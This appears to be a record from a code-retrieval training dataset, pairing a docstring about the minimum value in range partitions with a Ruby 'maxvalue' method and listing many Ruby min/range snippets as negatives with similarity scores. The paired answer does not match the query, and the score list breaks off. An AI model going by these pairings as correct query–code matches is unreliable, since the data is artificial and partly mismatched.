"def casted_minimum\n minimum.blank? ? nil : (qtype_name == \"decimal\" ? minimum : minimum.to_i)\n end",
"def min\n return super if super.nil?\n (numeric_type == 'Integer') ? super.to_i : super.to_f\n end",
"def min\n to_a.min\n end",
"def get_min()\n end",
"def min\n return @t_min\n end",
"def min() end",
"def min; end",
"def min; end",
"def get_min()\n @data.min\n end",
"def low\n @range_low\n end",
"def get_min()\n @min\n end",
"def range_start; range.first; end",
"def range_low_or_nil\n return nil unless respond_to?(:range) && respond_to?(:range_low)\n range_low unless range == I18n.t('comparables.missing')\n end",
"def get_min\n @min\n end",
"def acceptable_min\n return unless min_max_validator\n\n min_max_validator.options[:in]&.min || type_related_acceptable_min\n end",
"def minimum\n object.minimum.to_f\n end",
"def min\n @min || 0;\n end",
"def min\n end",
"def min\n end",
"def min\n self.class.min\n end",
"def get_min()\n @min \n end",
"def min_tb_rangeF; @min_sf; end",
"def key_for_min_value\n end",
"def min(value)\n opts[:min] = value\n end",
"def min\n only_with('min', 'NilClass', 'Numeric', 'String', 'DateTime')\n items.compact.min\n end",
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def min_tb_rangeE; @min_se; end",
"def minimum\n return @minimum\n end",
"def minimum_value\n @minimum_value || store.min\n end",
"def t_min\n @temp.min\n end",
"def numeric_from\n @from\n end",
"def odb_min\n \"min(#{to_s})\"\n end",
"def origin\n range.low\n end",
"def find_min()\r\n self.min\r\n end",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def set_min( min )\n if IntegerOption.bounds_ok?( min, @max )\n @min = min\n else\n @min = nil\n raise \"invalid lower bound: #{ min.to_s }\"\n end\n end",
"def relevant_range\n if (first_partition = current_partitions.min)\n # Case 1: First partition starts with MINVALUE, i.e. from is nil -> start with first real partition\n # Case 2: Rather unexpectedly, first partition does not start with MINVALUE, i.e. from is not nil\n # In this case, use first partition beginning as a start\n min_date = first_partition.from || first_partition.to\n end\n\n if pruning_old_partitions?\n min_date ||= oldest_active_date\n end\n\n # In case we don't have a partition yet\n min_date ||= Date.today\n min_date = min_date.beginning_of_month\n\n max_date = Date.today.end_of_month + HEADROOM\n\n [min_date, max_date]\n end",
"def m_range\r\n end",
"def min(args)\n col = column field: args[:field]\n col.map! {|item| item = item.to_f} \n col.min\n end",
"def minimum=(value)\n @minimum = value\n end",
"def min(field)\n determine(field, :<=)\n end",
"def min( value )\n if value < self\n value\n else\n self\n end\n end",
"def minmax\n [min, unbounded? ? INFINITY : max]\n end",
"def start\n @range.start\n end",
"def schema_range_type(db_type)\n :range\n end",
"def range; end",
"def range; end",
"def range; end",
"def range\n unless value.is_a? Range\n errors.add(:value, :range)\n end\n end",
"def minimum\n Minimum.new(self)\n end",
"def range_value\n string_value\n end",
"def min_element\n self.to_a.min\n end",
"def min\n\t\tm = self.valor[0]\n\t\tfor i in (0...self.valor.size.to_i)\n\t\t\t\tif (self.valor[i]< m)\n\t\t\t\t\tm = self.valor[i]\n\t\t\t\tend\n\t\tend\n\t\treturn m\n\tend",
"def get_min\n @min ||= calculate_min\n end",
"def min_value(value, pdef)\n if(value.to_i >= pdef['MinValue'].to_i)\n true\n else\n \"Value must not be less than #{pdef['MinValue']}\"\n end\n end",
"def min(attr)\n column(attr).min\n end",
"def min\n empty? ? Float::INFINITY : @list.head.value[1]\n end",
"def min\n empty? ? Float::INFINITY : @list.head.value[1]\n end",
"def min_point\n # generate the bounding box if not already done\n bounding_box\n # return the min\n @min\n end",
"def restrict(value, range)\n [[value, range.first].max, range.last].min\n end",
"def get_range_start(code_point, block_data)\n start_data = block_data[block_data.keys.min]\n\n if start_data[1] =~ /<.*, First>/\n start_data = start_data.clone\n start_data[0] = code_point\n start_data[1] = start_data[1].sub(', First', '')\n start_data\n end\n end",
"def create_range_data( rng, minrng=0, type=0, direction=2 )\n return Handlers::Range.createRange( rng, minrng, type, direction )\n end",
"def range_from_field(field)\n if class_exists? field.variable\n range = @problem.get_objects_of_class(field.variable)\n else\n range = @problem.objects[field.variable].get_value(field.attribute).to\n end\n range\n end",
"def min_value_quarter_sheet(value)\n only_values = self.class.only_values\n min = only_values.first\n only_values.each do |only_value|\n if only_value <= value\n min = only_value\n else\n break\n end\n end\n {:base_value => base_value,:value_quarter_sheet =>min ,:t => eval(\"v_#{min}_t\"),:tr => eval(\"v_#{min}_tr\")}\n end",
"def validation_min\n validation = validations? && validations.find do |validation|\n validation.kind == :numericality\n end\n\n if validation\n # We can't determine an appropriate value for :greater_than with a float/decimal column\n raise IndeterminableMinimumAttributeError if validation.options[:greater_than] && column? && [:float, :decimal].include?(column.type)\n\n if validation.options[:greater_than_or_equal_to]\n return (validation.options[:greater_than_or_equal_to].call(object)) if validation.options[:greater_than_or_equal_to].kind_of?(Proc)\n return (validation.options[:greater_than_or_equal_to])\n end\n\n if validation.options[:greater_than]\n return (validation.options[:greater_than].call(object) + 1) if validation.options[:greater_than].kind_of?(Proc)\n return (validation.options[:greater_than] + 1)\n end\n end\n end",
"def minimum(arr)\n m = arr.min\n m\n end",
"def find_min\n loc = find_min_locator and loc.value\n end",
"def start\n @min\n end",
"def set_Minimum(value)\n set_input(\"Minimum\", value)\n end",
"def lower_bound_inclusive\n lower_bound\n end",
"def min\n @store.peek[:min] unless empty?\n end",
"def range_to_value\n return nil if range.nil?\n if val = self.ranges[range.to_sym]\n val.value.call\n else\n raise TypeError, \"invalid range #{range}. Please define it.\"\n end\n end",
"def min_range=(range)\n @min_range = [0, range].max\n @max_range = [@min_range, @max_range].max\n end",
"def range(range)\n assert_range range\n schema do |s|\n s.type range.begin.is_a?(Integer) ? 'integer' : 'number'\n s.minimum range.begin\n s.maximum range.end, exclusive: range.exclude_end? unless range.end.nil?\n end\n end",
"def min\n if min_element.kind_of? Array\n min_element.first\n else\n min_element\n end\n end",
"def to_range\n case\n when open?, unknown?\n nil\n else\n Range.new(unknown_start? ? Date.new : @from, max)\n end\n end",
"def rarest\n mode_generic :min\n end",
"def range\n @range ||= set_range\n end",
"def min\n @min ||= time_parts[1]\n end",
"def get_min()\n # smallest = Float::INFINITY\n # @stack.each do |item|\n # if item < smallest\n # smallest = item\n # end\n # end\n # return smallest\n @stack.min\n end",
"def my_min(array)\n\t\n\tarray.min\n\t\nend",
"def smallest_range_i(a, k)\n result = a.max - a.min - 2 * k\n result >= 0 ? result : 0\nend",
"def range_start=( value ); @range_start = value; rationalise_dates(); end",
"def range(range)\n opts[:min] = range.begin\n opts[:max] = range.end\n end",
"def min_gauge\n data[:min_gauge]\n end",
"def validate_range(value)\n classname = value.class.to_s\n case classname\n when \"Range\" \n then value\n when \"Array\"\n then value\n else\n return (value..value)\n end\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def first\n @range.first\n end",
"def range\n object.range + DEFAULT_MAX_DISTANCE\n end",
"def better_my_min\n min = self.first\n self.each do |el|\n min = el if el < min\n end\n min\n end",
"def min_range (digits)\n\tstarta = [\"1\"]\n\t1.upto(digits-1) do |i|\n\t\tstarta.insert(i,0)\n\tend\n return starta.to_s.to_i\nend",
"def left\n @x_min\n end",
"def from\n @from == -Float::INFINITY ? nil : @from\n end"
] |
[
"0.71220946",
"0.70545757",
"0.6893678",
"0.67407",
"0.6515799",
"0.6494269",
"0.64925396",
"0.6426321",
"0.64184254",
"0.64184254",
"0.6386808",
"0.637547",
"0.635593",
"0.6348471",
"0.6339401",
"0.632692",
"0.6290225",
"0.62870634",
"0.6271629",
"0.6221216",
"0.6221216",
"0.61985236",
"0.61813456",
"0.617979",
"0.6172044",
"0.61431867",
"0.61163294",
"0.6116107",
"0.6116107",
"0.60615396",
"0.5991603",
"0.5985911",
"0.59824145",
"0.59527135",
"0.5936669",
"0.593237",
"0.5903712",
"0.590333",
"0.590333",
"0.590333",
"0.58913904",
"0.588418",
"0.5878332",
"0.5873431",
"0.5836004",
"0.57959384",
"0.5766558",
"0.5762322",
"0.57378846",
"0.5736755",
"0.573156",
"0.573156",
"0.573156",
"0.5730428",
"0.57220393",
"0.57055086",
"0.56934315",
"0.5682015",
"0.567918",
"0.56684995",
"0.56648225",
"0.5660953",
"0.5660953",
"0.5655875",
"0.5620945",
"0.56165385",
"0.56021273",
"0.56011224",
"0.55905133",
"0.55834",
"0.5560406",
"0.5542995",
"0.5534406",
"0.5528613",
"0.55249846",
"0.55219364",
"0.55204046",
"0.5519689",
"0.55026364",
"0.5499218",
"0.5490894",
"0.54833454",
"0.54635",
"0.54627895",
"0.5462095",
"0.54577196",
"0.5455514",
"0.5453215",
"0.54465973",
"0.5434956",
"0.54315954",
"0.54163367",
"0.54163367",
"0.54163367",
"0.5408083",
"0.5403758",
"0.53966504",
"0.53815615",
"0.53711325",
"0.53664356"
] |
0.67341924
|
4
|
The minimum value of the data type used in range partitions, useful as an argument to to.
|
def maxvalue
MAXVALUE
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def casted_minimum\n minimum.blank? ? nil : (qtype_name == \"decimal\" ? minimum : minimum.to_i)\n end",
"def min\n return super if super.nil?\n (numeric_type == 'Integer') ? super.to_i : super.to_f\n end",
"def min\r\n @range.min\r\n end",
"def minvalue\n MINVALUE\n end",
"def min\n to_a.min\n end",
"def min\n @range.begin\n end",
"def min\n return @t_min\n end",
"def get_min()\n @data.min\n end",
"def minimum\n object.minimum.to_f\n end",
"def get_min()\n end",
"def min\n self.class.min\n end",
"def get_min()\n @min\n end",
"def get_min\n @min\n end",
"def min() end",
"def min; end",
"def min; end",
"def key_for_min_value\n end",
"def min\n @min || 0;\n end",
"def minimum_value\n @minimum_value || store.min\n end",
"def min\n only_with('min', 'NilClass', 'Numeric', 'String', 'DateTime')\n items.compact.min\n end",
"def acceptable_min\n return unless min_max_validator\n\n min_max_validator.options[:in]&.min || type_related_acceptable_min\n end",
"def get_min()\n @min \n end",
"def t_min\n @temp.min\n end",
"def minimum\n return @minimum\n end",
"def odb_min\n \"min(#{to_s})\"\n end",
"def min\n end",
"def min\n end",
"def range_low_or_nil\n return nil unless respond_to?(:range) && respond_to?(:range_low)\n range_low unless range == I18n.t('comparables.missing')\n end",
"def find_min()\r\n self.min\r\n end",
"def low\n @range_low\n end",
"def min_tb_rangeF; @min_sf; end",
"def min_element\n self.to_a.min\n end",
"def min(value)\n opts[:min] = value\n end",
"def min_tb_rangeE; @min_se; end",
"def min(args)\n col = column field: args[:field]\n col.map! {|item| item = item.to_f} \n col.min\n end",
"def min\n empty? ? Float::INFINITY : @list.head.value[1]\n end",
"def min\n empty? ? Float::INFINITY : @list.head.value[1]\n end",
"def minimum\n Minimum.new(self)\n end",
"def min(attr)\n column(attr).min\n end",
"def min\n if min_element.kind_of? Array\n min_element.first\n else\n min_element\n end\n end",
"def min(field)\n determine(field, :<=)\n end",
"def min( value )\n if value < self\n value\n else\n self\n end\n end",
"def validation_min\n validation = validations? && validations.find do |validation|\n validation.kind == :numericality\n end\n\n if validation\n # We can't determine an appropriate value for :greater_than with a float/decimal column\n raise IndeterminableMinimumAttributeError if validation.options[:greater_than] && column? && [:float, :decimal].include?(column.type)\n\n if validation.options[:greater_than_or_equal_to]\n return (validation.options[:greater_than_or_equal_to].call(object)) if validation.options[:greater_than_or_equal_to].kind_of?(Proc)\n return (validation.options[:greater_than_or_equal_to])\n end\n\n if validation.options[:greater_than]\n return (validation.options[:greater_than].call(object) + 1) if validation.options[:greater_than].kind_of?(Proc)\n return (validation.options[:greater_than] + 1)\n end\n end\n end",
"def range_start; range.first; end",
"def minimum=(value)\n @minimum = value\n end",
"def min\n\t\tm = self.valor[0]\n\t\tfor i in (0...self.valor.size.to_i)\n\t\t\t\tif (self.valor[i]< m)\n\t\t\t\t\tm = self.valor[i]\n\t\t\t\tend\n\t\tend\n\t\treturn m\n\tend",
"def min\n @store.peek[:min] unless empty?\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def schema_range_type(db_type)\n :range\n end",
"def get_min\n @min ||= calculate_min\n end",
"def rarest\n mode_generic :min\n end",
"def min_point\n # generate the bounding box if not already done\n bounding_box\n # return the min\n @min\n end",
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def get_min()\n # smallest = Float::INFINITY\n # @stack.each do |item|\n # if item < smallest\n # smallest = item\n # end\n # end\n # return smallest\n @stack.min\n end",
"def least\n nil\n end",
"def numeric_from\n @from\n end",
"def minimum(arr)\n m = arr.min\n m\n end",
"def better_my_min\n min = self.first\n self.each do |el|\n min = el if el < min\n end\n min\n end",
"def min_value(value, pdef)\n if(value.to_i >= pdef['MinValue'].to_i)\n true\n else\n \"Value must not be less than #{pdef['MinValue']}\"\n end\n end",
"def range_value\n string_value\n end",
"def minmax\n [min, unbounded? ? INFINITY : max]\n end",
"def set_min( min )\n if IntegerOption.bounds_ok?( min, @max )\n @min = min\n else\n @min = nil\n raise \"invalid lower bound: #{ min.to_s }\"\n end\n end",
"def smallest\n # self.compact.sort.first\n self.compact.min\n end",
"def peekMin()\n @store[1]\n end",
"def find_min\n loc = find_min_locator and loc.value\n end",
"def min\n @nodes.first\n end",
"def origin\n range.low\n end",
"def find_min_priority\n loc = find_min_locator and [loc.value, loc.priority]\n end",
"def my_min(array)\n\t\n\tarray.min\n\t\nend",
"def relevant_range\n if (first_partition = current_partitions.min)\n # Case 1: First partition starts with MINVALUE, i.e. from is nil -> start with first real partition\n # Case 2: Rather unexpectedly, first partition does not start with MINVALUE, i.e. from is not nil\n # In this case, use first partition beginning as a start\n min_date = first_partition.from || first_partition.to\n end\n\n if pruning_old_partitions?\n min_date ||= oldest_active_date\n end\n\n # In case we don't have a partition yet\n min_date ||= Date.today\n min_date = min_date.beginning_of_month\n\n max_date = Date.today.end_of_month + HEADROOM\n\n [min_date, max_date]\n end",
"def get_min()\n @array[-1][1]\n end",
"def minimum\n sides.map(&:value).min\n end",
"def min_gauge\n data[:min_gauge]\n end",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def min\n @min ||= time_parts[1]\n end",
"def set_Minimum(value)\n set_input(\"Minimum\", value)\n end",
"def tempo_min\n @tempo_min ||= data[:tempo_min].to_i\n end",
"def range_to_value\n return nil if range.nil?\n if val = self.ranges[range.to_sym]\n val.value.call\n else\n raise TypeError, \"invalid range #{range}. Please define it.\"\n end\n end",
"def find_min_value(array)\n return array.min\nend",
"def min_value_quarter_sheet(value)\n only_values = self.class.only_values\n min = only_values.first\n only_values.each do |only_value|\n if only_value <= value\n min = only_value\n else\n break\n end\n end\n {:base_value => base_value,:value_quarter_sheet =>min ,:t => eval(\"v_#{min}_t\"),:tr => eval(\"v_#{min}_tr\")}\n end",
"def find_min\r\n return nil if !@head\r\n cursor = @head\r\n min = cursor.data\r\n while cursor\r\n if cursor.data < min\r\n min = cursor.data\r\n end\r\n cursor = cursor.next\r\n end\r\n return min\r\n end",
"def min\n @v.compact.min\n rescue\n nil\n end",
"def min_x\n c2f_x(0)\n end",
"def range\n unless value.is_a? Range\n errors.add(:value, :range)\n end\n end",
"def is_min_number?()\n return @ucItemNumber.value == @ucItemNumber.min\n end",
"def left\n @x_min\n end",
"def min_value\n if @head.nil?\n return nil\n else\n if head.left\n min_value = min_search(head.left).data\n else\n min_value = head.data\n end\n end\n return min_value\n end",
"def first\n @range.first\n end",
"def m_range\r\n end",
"def infer_r_value(x)\n case x\n when Range\n x.to_a\n else\n x\n end\n end",
"def min\n @keys[0]\n end",
"def typecast(value)\n if value.kind_of?(Range) then Range.new(typecast(value.first), typecast(value.last))\n elsif value.kind_of?(Array) then value.map{|v| typecast(v)}\n elsif primitive == BigDecimal then super(value).to_f\n elsif primitive == DateTime then Time.parse(super(value).to_s).to_i\n elsif primitive == Date then Time.parse(super(value).to_s).to_i\n elsif primitive == Time then super(value).to_i\n else\n super(value) # Good luck\n end\n end",
"def value_type\n @type.value_type\n end",
"def min()\n return stack.stack.last[:min]\n end",
"def subtype\n self.numeric_type\n end",
"def subtype\n self.numeric_type\n end"
] |
[
"0.7153883",
"0.7048134",
"0.67539436",
"0.6592181",
"0.65727943",
"0.65612084",
"0.6537592",
"0.6452847",
"0.6444002",
"0.63955337",
"0.63713956",
"0.63656867",
"0.6273183",
"0.6239701",
"0.62211186",
"0.62211186",
"0.62070656",
"0.61946446",
"0.6178495",
"0.6156211",
"0.6116574",
"0.6110825",
"0.60353035",
"0.6034875",
"0.6026568",
"0.6020158",
"0.6020158",
"0.60174876",
"0.5945713",
"0.5940888",
"0.59148866",
"0.591221",
"0.5910731",
"0.58039147",
"0.5784461",
"0.57828206",
"0.57828206",
"0.5758865",
"0.57566047",
"0.5735282",
"0.5668474",
"0.56684023",
"0.56583786",
"0.56396866",
"0.562749",
"0.562412",
"0.5611304",
"0.5590029",
"0.5590029",
"0.5590029",
"0.5584117",
"0.558352",
"0.5570801",
"0.55707735",
"0.55623794",
"0.55623794",
"0.5555953",
"0.55124396",
"0.5504035",
"0.55009013",
"0.5478255",
"0.5473461",
"0.5434739",
"0.5433176",
"0.54199123",
"0.5413922",
"0.540758",
"0.5405908",
"0.5403861",
"0.54024255",
"0.54022306",
"0.53924066",
"0.5392367",
"0.53827596",
"0.5363557",
"0.53632456",
"0.53591096",
"0.53591096",
"0.53591096",
"0.53539014",
"0.53446996",
"0.5334617",
"0.5331522",
"0.53303254",
"0.5325022",
"0.5314397",
"0.5305429",
"0.52930474",
"0.52684796",
"0.5264694",
"0.52471477",
"0.5243009",
"0.52273643",
"0.52238935",
"0.52234584",
"0.52165467",
"0.51992345",
"0.5196032",
"0.5183783",
"0.5168788",
"0.5168788"
] |
0.0
|
-1
|
Assumes range partitioning, sets the inclusive minimum value of the range for this partition.
|
def from(*v)
@from = v
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def min\n @range.begin\n end",
"def set_min(min)\n\n @min = min \n\n end",
"def set_min( min )\n if IntegerOption.bounds_ok?( min, @max )\n @min = min\n else\n @min = nil\n raise \"invalid lower bound: #{ min.to_s }\"\n end\n end",
"def minimum=(value)\n @minimum = value\n end",
"def min\r\n @range.min\r\n end",
"def set_Minimum(value)\n set_input(\"Minimum\", value)\n end",
"def min(value)\n opts[:min] = value\n end",
"def min_range=(range)\n @min_range = [0, range].max\n @max_range = [@min_range, @max_range].max\n end",
"def relevant_range\n if (first_partition = current_partitions.min)\n # Case 1: First partition starts with MINVALUE, i.e. from is nil -> start with first real partition\n # Case 2: Rather unexpectedly, first partition does not start with MINVALUE, i.e. from is not nil\n # In this case, use first partition beginning as a start\n min_date = first_partition.from || first_partition.to\n end\n\n if pruning_old_partitions?\n min_date ||= oldest_active_date\n end\n\n # In case we don't have a partition yet\n min_date ||= Date.today\n min_date = min_date.beginning_of_month\n\n max_date = Date.today.end_of_month + HEADROOM\n\n [min_date, max_date]\n end",
"def min() end",
"def set_lower_bound!(partitions)\n @operations_lower_bound = (partitions.op_optimized_size.to_f / @list.size).ceil\n @operations_rounding_adjustment = @operations_lower_bound * @list.size - partitions.op_optimized_size\n @sites_lower_bound = (partitions.total_sites.to_f / @list.size).ceil\n @sites_rounding_adjustment = @sites_lower_bound * @list.size - partitions.total_sites\n end",
"def position_min=(new_position_min)\n Klass.setPositionMin(@handle, @index, new_position_min.to_f)\n new_position_min\n end",
"def low\n @range_low\n end",
"def min( value )\n if value < self\n value\n else\n self\n end\n end",
"def set_min_value(value_array)\n min = value_array[0]\n\n value_array.each do |value|\n min = value if value < min\n end\n min\nend",
"def range_start=( value ); @range_start = value; rationalise_dates(); end",
"def earliest_limit=( value )\n @earliest_limit = to_date( value )\n end",
"def min=(value)\n MSPhysics::Newton::Hinge.set_min(@address, value)\n end",
"def set_MinEntries(value)\n set_input(\"MinEntries\", value)\n end",
"def min\n @min || 0;\n end",
"def range\n @range ||= set_range\n end",
"def set_MinLatitude(value)\n set_input(\"MinLatitude\", value)\n end",
"def set_MinLatitude(value)\n set_input(\"MinLatitude\", value)\n end",
"def range_start; range.first; end",
"def normalize\n store.normalize(minimum: minimum_value, spread: @spread)\n end",
"def from(start_key)\n unless partition_specified?\n raise IllegalQuery,\n \"Can't construct exclusive range on partition key #{range_key_name}\"\n end\n scoped(lower_bound: bound(true, true, start_key))\n end",
"def minvalue\n MINVALUE\n end",
"def min_position=(value)\n MSPhysics::Newton::Corkscrew.set_min_position(@address, value)\n end",
"def minimum_price(price)\n set_limiting_value(:minimum, :price, price)\n end",
"def SetRange(range)\n @range=range\n end",
"def set_min(fields)\n view.update_many(\"$min\" => collect_operations(fields))\n end",
"def min; end",
"def min; end",
"def get_min\n @min ||= calculate_min\n end",
"def range=(range)\n @range = range\n end",
"def replace_min(value, priority=value, subpriority=nil)\n subpriority ||= @totalcount\n @totalcount += 1\n loc = find_min_locator\n loc.update(value, priority, subpriority)\n loc\n end",
"def min\n move(0)\n end",
"def min\n end",
"def min\n end",
"def reset()\n @value = self.min\n end",
"def declare_beg_range\n\t\t@beg_range = @beg_range.to_date \n\t\t@end_range = @end_range.to_date \n\tend",
"def insert range_first, value\n @values[range_first] = value\n lowers = @values.keys.sort\n uppers = @values.keys.sort\n lowers.pop\n uppers.shift\n @ranges = []\n for i in 0...lowers.size do\n @ranges << (lowers[i]...uppers[i])\n end\n end",
"def range=(range)\n @range = range\n end",
"def range(range)\n opts[:min] = range.begin\n opts[:max] = range.end\n end",
"def minimum\n Minimum.new(self)\n end",
"def peek_min\n if next_head = self.head.sibling\n current_head = self.head\n while next_head \n next_head < current_head ? @min = next_head : @min = current_head\n current_head = next_head\n next_head = next_head.sibling \n end\n else\n @min = self.head\n end\n @min\n end",
"def set_rating_range range = nil\n raterange = case range\n when Array\n arr = range.sort\n Range.new arr.first, arr.last\n when Range\n range\n when nil\n (1..5)\n else\n raise ArgumentError, \"Must be a range, was: #{range}\"\n end\n\n (class << self; self; end).send(:define_method, :rating_range) do\n raterange\n end\n end",
"def min_value_quarter_sheet(value)\n only_values = self.class.only_values\n min = only_values.first\n only_values.each do |only_value|\n if only_value <= value\n min = only_value\n else\n break\n end\n end\n {:base_value => base_value,:value_quarter_sheet =>min ,:t => eval(\"v_#{min}_t\"),:tr => eval(\"v_#{min}_tr\")}\n end",
"def min_point\n # generate the bounding box if not already done\n bounding_box\n # return the min\n @min\n end",
"def min()\n return MicrosoftGraph::Drives::Item::Items::Item::Workbook::Functions::Min::MinRequestBuilder.new(@path_parameters, @request_adapter)\n end",
"def minimum_value\n @minimum_value || store.min\n end",
"def clamp(value, minimum_inclusive, maximum_inclusive)\n\n if minimum_inclusive > maximum_inclusive\n\n swap = minimum_inclusive\n\n minimum_inclusive = maximum_inclusive\n maximum_inclusive = swap\n end\n\n value < minimum_inclusive ? minimum_inclusive : value < maximum_inclusive ? value : maximum_inclusive\n end",
"def minimum_beds(beds)\n set_limiting_value(:minimum, :beds, beds)\n end",
"def add_leading_range\n @allocated_ranges.prepend((0..0))\n try_to_join_leading_ranges\n 0\n end",
"def start\n @min\n end",
"def get_min\n @min\n end",
"def get_min()\n @min\n end",
"def enlarge(growth)\r\n if @range.none?\r\n @range = 0...growth\r\n else\r\n @range = (@range.min)..(@range.max + growth)\r\n end\r\n end",
"def range=(range)\n @range = Range.new(range)\n end",
"def min(field)\n determine(field, :<=)\n end",
"def get_min()\n end",
"def setLowHigh(low, high)\n # Make sure the values aren't out of bounds.\n if low <= high\n @low = low\n @high = high\n elsif low > high\n @low = high\n @high = low\n end\n\n # Make sure the user hasn't done something silly.\n self.limitCurrentValue\n end",
"def get_min()\n @min \n end",
"def my_min_once\n min = first\n each do |num|\n if num < min\n min = num\n end\n end\n min\n end",
"def find_min()\r\n self.min\r\n end",
"def min_tb_rangeF; @min_sf; end",
"def extend_leading_range\n id = @allocated_ranges[0].last.succ\n @allocated_ranges[0] = (@allocated_ranges[0].first..@allocated_ranges[0].last.succ)\n try_to_join_leading_ranges\n id\n end",
"def find_min\n loc = find_min_locator and loc.value\n end",
"def smallest_range_i(a, k)\n result = a.max - a.min - 2 * k\n result >= 0 ? result : 0\nend",
"def set_MinCount(value)\n set_input(\"MinCount\", value)\n end",
"def set_MinCount(value)\n set_input(\"MinCount\", value)\n end",
"def get_range_start(code_point, block_data)\n start_data = block_data[block_data.keys.min]\n\n if start_data[1] =~ /<.*, First>/\n start_data = start_data.clone\n start_data[0] = code_point\n start_data[1] = start_data[1].sub(', First', '')\n start_data\n end\n end",
"def <=>(other) range_start <=> other.range_start end",
"def min_value(value, pdef)\n if(value.to_i >= pdef['MinValue'].to_i)\n true\n else\n \"Value must not be less than #{pdef['MinValue']}\"\n end\n end",
"def find_min_from_range(segment_arr, qlow, qhi, low, hi, pos)\n if(qlow <= low && qhi >= hi) # total overlap\n return segment_arr[pos]\n elsif(qlow > hi || qhi < low) # No Overlap\n return Integer::INFINITY\n end\n\n mid = (low+hi)/2\n [find_min_from_range(segment_arr, qlow, qhi, low, mid, pos*2+1),\n find_min_from_range(segment_arr, qlow, qhi, mid+1, hi, pos*2+2)].min\nend",
"def min(field = nil)\n block_given? ? super() : aggregates(field)[\"min\"]\n end",
"def min (row_num)\n row = @rows[row_num]\n min = row[0]\n row.each do |num|\n if min == 0 then\n min = num\n end\n if (num < min) && (num != 0) then\n min = num\n end\n end\n return min\n end",
"def min(x, s) \n\tif x < s\n\t\treturn x\n\tend\n \t\n\treturn s\nend",
"def minimum_coverage(val)\n raise \"minimum_coverage requires a Float.\" unless val.is_a? Float\n raise \"minimum_coverage must be between 0 and 100\" unless val.between?(0, 100)\n @minimumCoverage = val\n self\n end",
"def minimum_attendee_percentage=(value)\n @minimum_attendee_percentage = value\n end",
"def add_partition_to_all_lowest( tp, nb_partitions_to_add )\n\n nodes_sizes_replicas = @nodes_lists_replicas.hmap { |k,v| { k => v.size } }\n nodes_lowest = nodes_sizes_replicas.sort_by{|k,v| v}.map { |a| a[0] }\n\n nodes_lowest.each do |node|\n break if nb_partitions_to_add <= 0\n\n unless @nodes_lists_replicas[node].has_key?(tp)\n add_partition_to_node( tp, node )\n nb_partitions_to_add -= 1\n end\n end\n end",
"def minimum\n return @minimum\n end",
"def range=(aRange)\n range.assign(aRange)\n end",
"def min=(newmin)\n newmin = newmin.to_i\n raise ArgumentError, \"Invalid minute: '#{newmin}'.\" if newmin < 0 or newmin > 60\n @t_min = newmin\n end",
"def range\n @range ||= 0.upto(@limit)\n end",
"def min(series, control, ignore=nil)\n each_subseries_in series, control do |name, subseries|\n { :min => subseries.values.sort.first }\n end\n end",
"def start\n @range.start\n end",
"def better_my_min\n min = self.first\n self.each do |el|\n min = el if el < min\n end\n min\n end",
"def set_FirstYearRange(value)\n set_input(\"FirstYearRange\", value)\n end",
"def set_FirstYearRange(value)\n set_input(\"FirstYearRange\", value)\n end",
"def set_FirstYearRange(value)\n set_input(\"FirstYearRange\", value)\n end",
"def original_scheduling_initial!(partitions)\n # Phase 1: Sort partitions by sites.size\n partitions.sort_by_sites!\n\n # Phase 2: Initial filling\n bin_assigner = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_assigner].total_sites + partitions.first.sites.size <= @sites_lower_bound\n @list[bin_assigner].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_assigner].total_sites == @sites_lower_bound\n full_bins += 1\n @sites_lower_bound -= 1 if full_bins == @list.size - @sites_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_assigner = (bin_assigner + 1) % @list.size\n end\n partitions\n end",
"def set_MinResult(value)\n set_input(\"MinResult\", value)\n end",
"def adapted_scheduling_initial!(partitions)\n bin_index = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_index].size + partitions.first.size <= @operations_lower_bound\n @list[bin_index].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_index].size == @operations_lower_bound\n full_bins += 1\n @operations_lower_bound -= 1 if full_bins == @list.size - @operations_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_index = (bin_index + 1) % @list.size\n end\n @list = @list.sort\n\n partitions\n end",
"def restrict(value, range)\n [[value, range.first].max, range.last].min\n end",
"def clamp(x, low, hi)\n x = low if x < low\n x = hi if x > hi\n return x\n end",
"def set_min_max_price_values\n price_facet_rows = @products.facet(:price).rows.sort_by{|row| row.value}\n @min_price = price_facet_rows.first.try(:value) || 0\n @max_price = price_facet_rows.last.try(:value) || 1000\n end",
"def minimum(arr)\n m = arr.min\n m\n end",
"def my_min(list)\n min = list.first \n\n list.each do |el|\n if el < min \n min = el \n end\n end\n min\nend"
] |
[
"0.72577417",
"0.72577417",
"0.71424174",
"0.7122371",
"0.70912755",
"0.69917667",
"0.6888057",
"0.6812013",
"0.68096876",
"0.6666901",
